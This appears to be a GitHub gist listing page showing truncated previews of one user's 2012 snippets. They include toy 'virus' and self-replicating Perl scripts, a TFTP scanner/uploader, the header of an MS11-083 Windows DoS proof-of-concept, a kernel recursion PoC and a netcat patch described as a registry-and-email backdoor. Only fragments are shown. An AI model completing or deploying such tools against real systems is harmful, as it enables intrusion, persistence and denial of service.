Skip to content

Instantly share code, notes, and snippets.

@fakessh
fakessh / tshell
Created September 23, 2012 02:03
tshell
#!/bin/sh
#bsearch.sh by ThreaT
for fichier in *
do
file $fichier > /tmp/t
if grep "shell" /tmp/t > /dev/null; then
echo "$fichier est un Bourne shell script"
fi
done
rm -f /tmp/t
@fakessh
fakessh / virii.sh
Created September 23, 2012 02:12
virii.sh
#!/bin/sh
#virii bash, by fakessh @
echo "je suis une chaine viral"
echo "je suis une chaine porteuse"
echo "--------------------------"
echo "attention, le petit virus vas sortir"
echo "------------------- ------"
grep "MvM" $0
echo "il est sortie à l'ecran"
echo "mais il peut sortir aussi dans un fichier"
@fakessh
fakessh / virii release
Created September 23, 2012 02:33
virri release
#!/opt/perl/bin/perl -w
use strict;
# HACKED
BEGIN {
local *ME;
if (open ME, $0) {
local $/;
my $me = <ME>;
@fakessh
fakessh / replicate.pl
Created September 23, 2012 03:20
replicate.pl
#!/usr/bin/perl
# Self-referencing, static-data permuting bizneratch-o-fun
#
# Writes a copy of itself out to STDOUT, and executes
# $payload (which currently writes to STDERR.
#
# For best results:
# $ ./replicate.pl > replicate.dup
#
# prole@subterrain.net
@fakessh
fakessh / scanneripuploadtftp.pl
Created September 23, 2012 07:41
scanneripuploadtftp.pl
#!/usr/bin/perl -w
use strict;
use warnings;
use Net::TFTP;
use Net::Ping;
use Data::Dumper;
use FileHandle;
BEGIN
{
@fakessh
fakessh / fixsperl-0
Created September 29, 2012 21:50
fixsperl-0
##http://www.cpan.org/src/5.0/fixsperl-0
## emulate setuid root program
#!/usr/bin/perl
# Usage:
# To fix one or more specific suidperl executables in, say, /usr/bin:
# cd /usr/bin
# fixsperl sperl?.???
# or, to check all $PATH directories for sperl?.??? and fix them, just say:
@fakessh
fakessh / pingudpevil.c
Created October 5, 2012 02:47
pingudpevil.c
/*
* MS11-083 DoS/PoC exploit
* ========================
* This attempts to trigger the ICMP refCount overflow
* in TCP/IP stack of Win7/Vista/Win2k8 hosts. This
* requires sending 2^32 UDP packets to a host on a closed
* port, or 4,294,967,296 packets. A dereference function
* must be called that is not triggered via UDP but ICMP
* echo packets. This exploit creates 250 threads and
* floods a host with UDP packets and then attempts to
@fakessh
fakessh / winntserverservice2003.c
Created October 9, 2012 11:48
winntserverservice2003.c
#define _WIN32_WINNT 0x0502 // Windows Server 2003 family
// For Win Xp, change accordingly...
#define _WIN32_WINNT 0x0501
// #define _WIN32_WINNT 0x0500 // Windows 2000
// #define _WIN32_WINNT 0x0400 // Windows NT 4.0
@fakessh
fakessh / pocrecursionkernel.sh
Last active October 11, 2015 13:47
pocrecursionkernel.sh
#!/bin/bash
# This software is provided by the copyright owner "as is" and any
# expressed or implied warranties, including, but not limited to,
# the implied warranties of merchantability and fitness for a particular
# purpose are disclaimed. In no event shall the copyright owner be
# liable for any direct, indirect, incidential, special, exemplary or
# consequential damages, including, but not limited to, procurement
# of substitute goods or services, loss of use, data or profits or
# business interruption, however caused and on any theory of liability,
# whether in contract, strict liability, or tort, including negligence
@fakessh
fakessh / nc.patch
Created October 10, 2012 22:47
nc create backdoor registry and email for nc111nt
Les fichiers binaires /home/swilting/Téléchargements/nc/doexec.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/doexec.o sont différents.
diff -crB /home/swilting/Téléchargements/nc/getopt.c /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c
*** /home/swilting/Téléchargements/nc/getopt.c 1996-11-06 22:40:36.000000000 +0100
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c 2012-10-26 15:30:01.812133992 +0200
***************
*** 45,51 ****
#include <stdio.h>
#ifdef WIN32
! #include <string.h>